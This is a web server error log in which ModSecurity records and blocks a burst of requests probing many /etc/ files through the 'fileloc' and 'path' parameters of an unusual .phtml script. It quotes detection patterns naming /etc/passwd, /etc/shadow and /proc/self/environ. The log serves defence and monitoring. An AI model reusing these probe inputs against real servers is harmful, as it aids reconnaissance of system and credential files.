[Thu Mar 19 13:21:58.920007 2026] [:error] [pid 17887:tid 140411548894976] [client 57.141.18.46:49048] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipgkwaGbbGflqUZDakAAAANc"]
[Thu Mar 19 13:21:59.125828 2026] [proxy_fcgi:error] [pid 27293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:45576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:21:59.131746 2026] [:error] [pid 31803:tid 140411540502272] [client 57.141.18.55:49052] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwip-yqAr6etmhZHNpy1wAAAFg"]
[Thu Mar 19 13:21:59.293369 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.27:49054] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwip9a6ubjKNq_cu4ZpvQAAA0s"]
[Thu Mar 19 13:21:59.710836 2026] [:error] [pid 14269:tid 140411641214720] [client 57.141.18.108:49068] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwipwbLMZ6AikZjR9VwagAAAAw"]
[Thu Mar 19 13:21:59.935410 2026] [:error] [pid 30077:tid 140411599251200] [client 57.141.18.53:49072] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwip_u8EFLIOrSqIpu7dQAAAlE"]
[Thu Mar 19 13:22:00.419559 2026] [:error] [pid 31803:tid 140411699963648] [client 57.141.18.83:49080] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqOyqAr6etmhZHNpy2AAAAEU"]
[Thu Mar 19 13:22:00.769414 2026] [:error] [pid 27403:tid 140411658000128] [client 57.141.18.3:49086] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqBkFeYa1D6dYQnAEMgAAAco"]
[Thu Mar 19 13:22:00.952064 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.1:49092] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqNa6ubjKNq_cu4ZpvgAAA00"]
[Thu Mar 19 13:22:01.457861 2026] [:error] [pid 17887:tid 140411691570944] [client 57.141.18.94:49094] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqQkwaGbbGflqUZDakQAAAMY"]
[Thu Mar 19 13:22:01.628617 2026] [:error] [pid 14269:tid 140411699963648] [client 57.141.18.1:49100] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqQbLMZ6AikZjR9VwawAAAAU"]
[Thu Mar 19 13:22:01.792829 2026] [:error] [pid 14269:tid 140411708356352] [client 57.141.18.33:49108] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqQbLMZ6AikZjR9VwbAAAAAQ"]
[Thu Mar 19 13:22:02.492784 2026] [:error] [pid 14269:tid 140411582465792] [client 57.141.18.12:49124] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqgbLMZ6AikZjR9VwbwAAABM"]
[Thu Mar 19 13:22:02.908214 2026] [:error] [pid 14269:tid 140411574073088] [client 57.141.18.103:49120] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqgbLMZ6AikZjR9VwcAAAABQ"]
[Thu Mar 19 13:22:03.497165 2026] [:error] [pid 31803:tid 140411658000128] [client 57.141.18.50:49128] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiq-yqAr6etmhZHNpy2gAAAEo"]
[Thu Mar 19 13:22:03.572088 2026] [:error] [pid 30077:tid 140411658000128] [client 57.141.18.57:49144] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiq_u8EFLIOrSqIpu7dwAAAko"]
[Thu Mar 19 13:22:03.833375 2026] [:error] [pid 14269:tid 140411624429312] [client 57.141.18.63:49152] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiqwbLMZ6AikZjR9VwcgAAAA4"]
[Thu Mar 19 13:22:04.384116 2026] [:error] [pid 14269:tid 140411641214720] [client 57.141.18.75:49164] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirAbLMZ6AikZjR9VwdAAAAAw"]
[Thu Mar 19 13:22:04.687653 2026] [:error] [pid 14269:tid 140411741927168] [client 57.141.18.74:49172] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirAbLMZ6AikZjR9VwdQAAAAA"]
[Thu Mar 19 13:22:04.942612 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.121:49178] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirNa6ubjKNq_cu4ZpwAAAA08"]
[Thu Mar 19 13:22:05.395477 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.47:49184] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirQbLMZ6AikZjR9VwdgAAABA"]
[Thu Mar 19 13:22:05.720234 2026] [:error] [pid 27403:tid 140411641214720] [client 57.141.18.41:49192] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirRkFeYa1D6dYQnAENgAAAcw"]
[Thu Mar 19 13:22:05.930621 2026] [:error] [pid 30077:tid 140411649607424] [client 57.141.18.71:49200] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirfu8EFLIOrSqIpu7eAAAAks"]
[Thu Mar 19 13:22:06.145571 2026] [:error] [pid 31803:tid 140411674785536] [client 57.141.18.21:49204] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiruyqAr6etmhZHNpy3QAAAEg"]
[Thu Mar 19 13:22:06.831249 2026] [:error] [pid 19093:tid 140411649607424] [client 57.141.18.10:49210] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirl_V7PWP6ixUYl7PpQAAAos"]
[Thu Mar 19 13:22:06.834107 2026] [:error] [pid 19093:tid 140411683178240] [client 57.141.18.120:49212] [client 57.141.18.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwirl_V7PWP6ixUYl7PpgAAAoc"]
[Thu Mar 19 13:22:07.344203 2026] [:error] [pid 31803:tid 140411548894976] [client 57.141.18.81:49224] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwir-yqAr6etmhZHNpy3wAAAFc"]
[Thu Mar 19 13:22:07.919577 2026] [:error] [pid 30077:tid 140411741927168] [client 57.141.18.21:49238] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwir_u8EFLIOrSqIpu7egAAAkA"]
[Thu Mar 19 13:22:08.152976 2026] [:error] [pid 27403:tid 140411674785536] [client 57.141.18.79:49242] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisBkFeYa1D6dYQnAEOAAAAcg"]
[Thu Mar 19 13:22:08.699568 2026] [:error] [pid 30077:tid 140411641214720] [client 57.141.18.109:49256] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwisPu8EFLIOrSqIpu7ewAAAkw"]
